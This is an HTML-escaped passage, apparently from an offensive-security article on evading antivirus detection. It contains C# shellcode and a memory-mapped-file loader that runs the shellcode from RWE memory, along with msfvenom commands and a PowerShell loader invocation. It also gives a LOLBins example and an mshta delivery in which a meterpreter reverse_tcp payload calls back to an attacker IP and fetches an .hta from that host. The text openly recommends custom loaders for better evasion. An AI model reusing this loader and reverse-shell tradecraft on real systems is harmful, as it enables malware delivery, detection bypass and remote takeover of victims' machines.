                   &lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x49&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x56&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x34&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x88&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xac&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x38&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x75&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xf1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x03&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x24&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x08&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x45&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x39&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x75&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x44&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x24&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x49&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x66&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x44&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x49&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x04&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x88&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x83&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x57&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xba&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xba&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x6f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x87&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xba&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x95&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x9d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0xd5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x83&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x28&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x06&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x7c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x80&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x75&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x05&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x47&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x13&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x72&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x89&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xda&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x63&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x61&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x63&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;
               &lt;span class="p"&gt;};&lt;/span&gt;

           &lt;span class="n"&gt;MemoryMappedFile&lt;/span&gt; &lt;span class="n"&gt;mmf&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
           &lt;span class="n"&gt;MemoryMappedViewAccessor&lt;/span&gt; &lt;span class="n"&gt;viewaccessor&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

           &lt;span class="k"&gt;try&lt;/span&gt;
           &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="cm"&gt;/* The try block creates the MMF and assigns the RWE permissions
               The view accessor is created with matching permissions
               the shell code from GetShellMemAddr is written to MMF
               then the pointer is gained and a delegate is created to handle pointer value
               so that it can be passed in therms of the returned function */&lt;/span&gt;

               &lt;span class="n"&gt;mmf&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;MemoryMappedFile&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;CreateNew&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"__shellcode"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MemoryMappedFileAccess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ReadWriteExecute&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;mmf&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;CreateViewAccessor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MemoryMappedFileAccess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ReadWriteExecute&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;WriteArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;pointer&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;*)&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SafeMemoryMappedViewHandle&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;AcquirePointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;func&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NewDelegate&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;Marshal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;GetDelegateForFunctionPointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="k"&gt;typeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NewDelegate&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
               &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;func&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt;
           &lt;span class="k"&gt;catch&lt;/span&gt;
           &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt;
           &lt;span class="k"&gt;finally&lt;/span&gt; &lt;span class="c1"&gt;// You should always clean up after yourself :)&lt;/span&gt;
           &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Dispose&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
               &lt;span class="n"&gt;mmf&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Dispose&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt;
       &lt;span class="p"&gt;}&lt;/span&gt;

       &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;Main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
       &lt;span class="p"&gt;{&lt;/span&gt;
           &lt;span class="nf"&gt;GetShellMemAddr&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
       &lt;span class="p"&gt;}&lt;/span&gt;
   &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;msfvenom&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;windows/x64/exec&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;CMD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"cmd.exe -c calc.exe"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-f&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;csharp&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Invoke-MMFml&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpnstcxx1406tdupz9cfu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpnstcxx1406tdupz9cfu.png" alt="Figure 10: MMFml PowerShell loader execution" width="716" height="69"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 10: MMFml PowerShell loader execution
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;I shall conclude the discussion on loaders at this point. It is highly recommended to develop custom loaders when possible, as they often yield superior evasion results.&lt;/p&gt;




&lt;h3&gt;
  
  
  B) Lolbins: Leveraging Trusted Binaries for Shellcode Loading
&lt;/h3&gt;

&lt;p&gt;Beyond the "cup and water" separation paradigm of loaders, I contend that &lt;strong&gt;Lolbins&lt;/strong&gt;—or whitelisted binaries—represent another significant category of separation-based evasion.&lt;/p&gt;

&lt;p&gt;These techniques are primarily designed to bypass &lt;strong&gt;behavioural detection&lt;/strong&gt;. For instance, when an application's execution context deviates from expected patterns—such as invoking specific &lt;strong&gt;APIs&lt;/strong&gt; that would not normally be called—such anomalous behaviour is readily detected. Whitelist-based exploitation circumvents these &lt;strong&gt;behavioural heuristics&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;It should be noted, however, that in some cases the shellcode or executable files employed in these techniques may still be written to disk, rendering them susceptible to signature-based detection. We shall address this aspect later in the article. Let us first examine the concept of whitelist exploitation.&lt;/p&gt;

&lt;p&gt;LOLBins, an acronym for "&lt;strong&gt;Living-Off-the-Land Binaries&lt;/strong&gt;", was originally conceived by Christopher Campbell and Matt Graeber at the DerbyCon security conference in 2013, with the term itself later coined by Philip Goh. In essence, these are trusted system binaries that can be repurposed for malicious activities. Consider the following examples:&lt;/p&gt;

&lt;h4&gt;
  
  
  DarkHydrus APT Sample
&lt;/h4&gt;

&lt;p&gt;MD5: B108412F1CDC0602D82D3E6B318DC634&lt;/p&gt;

&lt;p&gt;Launch command employed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;cscript.exe&lt;/span&gt; &lt;span class="s2"&gt;"C:\Users\Public\Documents\OfficeUpdateService.vbs"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This example utilises &lt;code&gt;cscript&lt;/code&gt; to execute a VBS script that establishes persistence via a startup entry.&lt;/p&gt;

&lt;h4&gt;
  
  
  Mshta:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;payload:
msfvenom &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;--platform&lt;/span&gt; windows &lt;span class="nt"&gt;-p&lt;/span&gt; windows/meterpreter/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53 &lt;span class="nt"&gt;-f&lt;/span&gt; raw &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; shellcode.bin

&lt;span class="nb"&gt;cat &lt;/span&gt;shellcode.bin |base64 &lt;span class="nt"&gt;-w&lt;/span&gt; 0

mshta.exe http://192.168.174.134 /qing.hta
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



